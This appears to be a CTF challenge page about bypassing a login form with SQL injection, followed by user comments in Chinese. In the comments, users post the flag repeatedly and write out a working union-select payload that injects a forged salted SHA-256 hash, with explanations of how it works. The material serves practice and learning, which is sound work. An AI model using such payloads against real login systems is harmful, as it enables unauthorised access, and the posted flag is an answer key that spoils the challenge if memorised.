sqli-0x1WEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 721
提  示:
描  述:
SQL injections are still a problem yes, even in 2021. Bypass the login mechanism and get access to the admin area.
评论
xiaodeng 10天前

哪个大佬有密码库

回复 0

17743520638 1月前

这道题非常有意思

回复 0

meilanzhuju 3月前

五边形战士

回复 0

波光摇曳 4月前

shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591ea}

回复 0

lzq2000 5月前

<?php echo hash(“sha256”, “123”.“456”);?> 得到 8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92 123是口令,456是盐

回复 1
xzs297995 1月前

@234722457 2a8610aefdd0028c6bf074dd18721c0ef8bc43241cc7a653d7aedf2036bdf6b3$654应该是这个 而且密码是987

回复 0

在浅水中溺水么? 2月前

@234722457 987654要换成2a8610aefdd0028c6bf074dd18721c0ef8bc43241cc7a653d7aedf2036bdf6b3

回复 0

234722457 4月前

大佬,不用 123456 用 987654 为什么失败啊

回复 0

lzq2000 5月前

查询一个不存在的账号,拼接union select,将自定义的密码和盐生成的加密字符串注入,覆盖密码查询结果,使用自定义的密码即可通过密码校验,post发送: user=a'union select 1,'8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92$456'--+&pass=123

回复 7
lzq2000 3天前

@Am0s 联合查询其实本质就是手工增加了一个结果集,跟从数据库中真正查询出来的结果是一样的效果。这里因为数据库中存储的是加过密的信息,所以我们得构造一下加密结果。

回复 0

lzq2000 3天前

@2957632449 是的,联合查询其实本质就是手工增加了一个结果集,结果就是对应字段的值!

回复 0

2957632449 1月前

佬 这边1,'8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92$456' 这一串 会自动新建一个结果集是吗 然后'8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92$456'这边代表的是字段password里的值对吗

回复 0

TwTsaltfish 2月前

@Am0s 3、源码中验证sha256(明文密码$pass+$result["password"]中$后的字符串【$salt】)=$result["password"]中$前的值

回复 0

TwTsaltfish 2月前

@Am0s 1、猜测原先就是两个字段、账号密码,正常情况下搜到的就是这两个字段$result["user"],$result["password"];2、查询一个不存在的账号,没有union会是空的,union查询得到的第二个值(这里如果有多个无用字段要测试哪个是密码)会作为$result["password"]进入后面的逻辑;3、源码中验证sha2

回复 0

Am0s 3月前

大佬能讲解一下原理吗

回复 0

JJhello 5月前

不太懂,来个大佬讲解一下

回复 0

yituoshi 6月前

Half the truth is often a big lie:Welcome back admin! Have a flag: shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591

回复 0

chaoge 6月前

shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591ea}

回复 0

justsosoloveyou 7月前

先绕过用户名的正则过滤。查询一个不存在的账号,拼接union select,将自定义的密码和盐生成的加密字符串注入,覆盖密码查询结果,使用自定义的密码即可通过密码校验。

回复 9
yituoshi 6月前

感谢高手指导

回复 1

WriteUp

image
a2cai

2 金币

评分(13)

解题动态

bachangxuexi 攻破了该题 3小时前
czhf20120704 攻破了该题 13小时前
tartaglia 攻破了该题 13小时前
飞羽2018 攻破了该题 15小时前
小白小白 攻破了该题 20小时前
Hibugku1 攻破了该题 21小时前
mrzeng 攻破了该题 21小时前
江户川 攻破了该题 1天前
17380168415 攻破了该题 2天前
菜鸡的小韩 攻破了该题 2天前
jikexinan 攻破了该题 2天前
派大星与海绵 攻破了该题 2天前
ctf_xiaobai 攻破了该题 3天前
to5ny 攻破了该题 3天前
soltude 攻破了该题 3天前
abcdrfg 攻破了该题 4天前
18054437665 攻破了该题 4天前
aaaabcc 攻破了该题 4天前
15267151599 攻破了该题 4天前
860054342 攻破了该题 5天前